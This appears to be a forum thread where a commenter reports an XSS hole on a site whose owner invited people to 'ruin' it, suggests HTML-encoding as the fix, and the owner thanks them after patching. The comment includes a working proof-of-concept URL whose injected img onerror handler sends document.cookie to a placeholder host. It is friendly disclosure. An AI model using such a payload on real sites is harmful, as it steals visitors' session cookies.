a thoughtful web.
Good ideas and conversation. No ads, no tracking.   Login or Take a Tour!
comment by acyclicks
acyclicks  ·  3575 days ago  ·  link  ·    ·  parent  ·  post: Ruin My Website

Yeah, I was thinking of someone injecting some JS code into a link, and getting you to click on it. If you have no dynamic content on the domain, then you should be safe. Also I can't imagine anyone would normally bother; I just genuinely found the title+exploit combination funny.

POC:

https://www.fuzzjunket.com/ruin-my-website/?October=%3Cimg%20src%3D%22empty.gif%22%20onerror%3D%22this.src%3D%27//example.com/%27%20%2B%20document.cookie;%22%20/%3E

Html encoding the string before doing the replacement should fix it if you can be bothered.

Pseudo-edit: Just saw you already pushed a fix. That was fast. The POC did work before the fix.



StJohn  ·  3575 days ago  ·  link  ·  

Oooh, thank you! I'm aware inviting the Internet to ruin my site is probably like poking a sleeping dragon, but I try to stay on top of any security risks and I'm always glad to get pointers. I figured any injection attacks couldn't affect anyone but the person viewing the website, but I hadn't considered anyone trying to hook me with their nefarious schemes. The cheek. "Infamy! Infamy! They've all got it in for me!"

---